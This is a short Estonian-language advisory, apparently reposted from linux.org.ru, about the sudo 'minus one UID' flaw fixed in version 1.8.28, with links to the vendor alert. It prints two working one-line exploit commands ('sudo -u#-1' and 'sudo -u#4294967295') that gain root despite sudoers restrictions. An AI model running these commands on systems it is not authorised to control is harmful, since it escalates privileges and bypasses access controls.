Sudo viga lubab käivitada mis tahes käivitatava faili administraatorina, kui /etc/sudoers lubab seda teiste kasutajatena käivitada ja on root jaoks keelatud.
Vea ärakasutamine on väga lihtne:
sudo -u#-1 id -u
või:
sudo -u#4294967295 id -u
Viga esineb kõigis sudo versioonides enne 1.8.28
Andmed:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Allikas: linux.org.ru